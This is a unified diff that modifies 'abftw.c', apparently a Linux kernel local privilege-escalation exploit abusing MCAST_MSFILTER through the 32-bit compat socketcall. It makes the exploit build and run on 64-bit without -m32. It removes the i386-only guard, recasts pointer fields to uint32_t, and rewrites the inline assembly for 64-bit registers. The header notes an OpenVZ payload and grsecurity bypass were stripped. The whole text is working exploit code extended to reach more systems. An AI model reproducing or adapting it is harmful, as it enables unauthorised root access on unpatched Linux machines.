--- abftw.c	2010-11-15 06:10:27.306495296 -0500
+++ abftw_64.c	2010-11-15 06:14:09.750552184 -0500
@@ -37,6 +37,9 @@
 PS:
 OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right ;))
 
+----
+Modified 2010-09-17 by Nelson Elhage <nelhage@ksplice.com> to work without -m32
+
 */
 
 #include <poll.h>
@@ -58,9 +61,6 @@
 #include <errno.h>
 
 
-#ifndef __i386__
-#error "r34d th3 c0d3 m0r0n!!# () #"
-#else
 #define _GNU_SOURCE
 #define __dgdhdytrg55 unsigned int
 #define __yyrhdgdtfs66ytgetrfd unsigned long long
@@ -254,8 +254,8 @@
   int s;
   int level;
   int optname;
-  void *optval;
-  volatile socklen_t *optlen;  
+  uint32_t optval;
+  volatile uint32_t optlen;  
 }__attribute__((packed));
 
 struct idt64from32_s 
@@ -635,30 +635,30 @@
  at.s = s;
  at.level = SOL_IP;
  at.optname = MCAST_MSFILTER;
- at.optval = buffer;
- at.optlen = &magiclen;
+ at.optval = (uint32_t)buffer;
+ at.optlen = (uint32_t)&magiclen;
 }
 
 
 static void bitch_call(struct socketcallAT *at, void *stack)
 {
   asm volatile(
-      "push %%ebx\t\n"
-      "push %%esi\t\n"
-      "push %%ecx\t\n"
-      "push %%edx\t\n"
+      "push %%rbx\t\n"
+      "push %%rsi\t\n"
+      "push %%rcx\t\n"
+      "push %%rdx\t\n"
       "movl $0x66, %%eax\t\n"
       "movl $0xf, %%ebx\t\n"
-      "movl %%esp, %%esi\t\n" 
-      "movl %0, %%ecx\t\n"
-      "movl %1, %%esp\t\n"
+      "movq %%rsp, %%rsi\t\n"
+      "movq %0, %%rcx\t\n"
+      "movq %1, %%rsp\t\n"
       "int $0x80\t\n"
-      "movl %%esi, %%esp\t\n"
-      "pop %%edx\t\n"
-      "pop %%ecx\t\n"
-      "pop %%esi\t\n"
-      "pop %%ebx\t\n"
-      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
+      "movq %%rsi, %%rsp\t\n"
+      "pop %%rdx\t\n"
+      "pop %%rcx\t\n"
+      "pop %%rsi\t\n"
+      "pop %%rbx\t\n"
+      :  : "r"(at), "r"(stack)  : "memory", "rax", "rcx", "rbx", "rsi"
      );
 }
 
@@ -925,6 +925,3 @@
   close(s);
   return 0;
 }
-
-#endif // -m32
-
